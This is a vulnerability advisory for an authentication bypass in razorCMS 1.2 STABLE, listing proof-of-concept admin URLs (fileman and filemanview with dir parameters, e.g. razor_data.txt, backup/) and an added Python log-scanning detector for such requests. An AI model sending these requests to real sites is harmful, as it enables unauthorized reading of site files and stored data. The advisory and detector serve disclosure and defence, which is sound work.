razorCMS File and Directory Authentication Bypass Vulnerability
BID:51344
Info
| Bugtraq ID: | 51344 |
| Class: | Access Validation Error |
| CVE: | CVE-2012-5918 CVE-2012-6038 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2012 12:00AM |
| Updated: | Mar 13 2013 05:25PM |
| Credit: | chap0 |
| Vulnerable: | Morgan Integrated Systems razorCMS 1.2 STABLE |
| Not Vulnerable: | Morgan Integrated Systems razorCMS 1.2.1 STABLE |
Discussion
razorCMS is prone to an authentication-bypass vulnerability.
An attacker can gain unauthorized access to files and directories. Successful exploits may lead to other attacks.
razorCMS 1.2 STABLE is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit this issue through a browser.
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/
http://www.example.com/admin/?action=filemanview&dir=backup/
http://www.example.com/admin/?action=filemanview&dir=/razor_data.txt
http://www.example.com/admin/?action=filemanview&dir=/index.htm
http://www.example.com/admin/?action=fileman&dir=razor_temp_logs/
http://www.example.com/admin/?action=fileman&dir=backup/
http://www.example.com/admin/?action=fileman&dir=/razor_data.txt
http://www.example.com/admin/?action=fileman&dir=/index.htm
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/sekrit/
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt
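Requests of this shape stand out in web server access logs. The following is an added example, not part of the original advisory or of razorCMS: it flags requests to the fileman and filemanview actions that carry a dir parameter. The combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Action names and the "dir" parameter come from the request URLs in this advisory.
FILEMAN_ACTIONS = {"fileman", "filemanview"}

# Assumption: the web server writes Apache/nginx "combined" format access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_fileman_requests(lines):
    """Return one record per request that reaches the admin file manager with a dir value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.rstrip("/").endswith("/admin"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)  # also decodes %2F and similar
        action = next((a for a in qs.get("action", []) if a in FILEMAN_ACTIONS), None)
        if action is None or "dir" not in qs:
            continue
        hits.append({"ip": m.group("ip"), "time": m.group("ts"), "action": action,
                     "dir": qs["dir"][0], "status": int(m.group("status"))})
    return hits

def served_dirs_by_client(hits):
    """Group dir values answered with a 2xx status by client address."""
    served = defaultdict(list)
    for h in hits:
        if 200 <= h["status"] < 300:
            served[h["ip"]].append(h["dir"])
    return dict(served)

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2012:09:14:02 +0000] "GET /admin/?action=filemanview&dir=backup/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2012:09:14:09 +0000] "GET /admin/?action=fileman&dir=%2Frazor_data.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2012:09:15:30 +0000] "GET /admin/?action=filemanview&dir=razor_temp_logs/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2012:09:16:00 +0000] "GET /admin/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, dirs in served_dirs_by_client(find_fileman_requests(SAMPLE_LOG)).items():
        print(ip, dirs)
```

The per-client result is meant to be compared against the addresses and times of known administrator sessions. A 2xx status alone does not prove that file contents were returned, so confirm with response sizes or application logs.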
Solution / Fix
Solution:
Updates are available. Please see the references for more information.
References
References:
- razorCMS Homepage (Morgan Integrated Systems)